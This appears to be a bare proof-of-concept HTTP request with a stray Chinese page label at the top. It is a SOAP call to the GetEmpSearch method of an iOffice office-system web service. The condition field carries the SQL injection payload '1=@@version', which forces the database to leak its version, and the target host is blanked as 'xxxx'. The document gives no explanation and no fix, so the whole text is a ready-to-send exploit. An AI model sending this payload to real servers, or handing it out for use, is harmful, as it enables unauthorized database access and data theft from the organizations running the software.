登录 白背景
POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.0

Host: xxxx

X-Real-IP: xxxx

X-Forwarded-For: xxxx

Connection: close

Content-Type: text/xml; charset=utf-8

SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"



<?xml version="1.0" encoding="utf-8"?>

<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">

<soap:Body>

<GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">

<condition>1=@@version</condition>

</GetEmpSearch>

</soap:Body>

</soap:Envelope>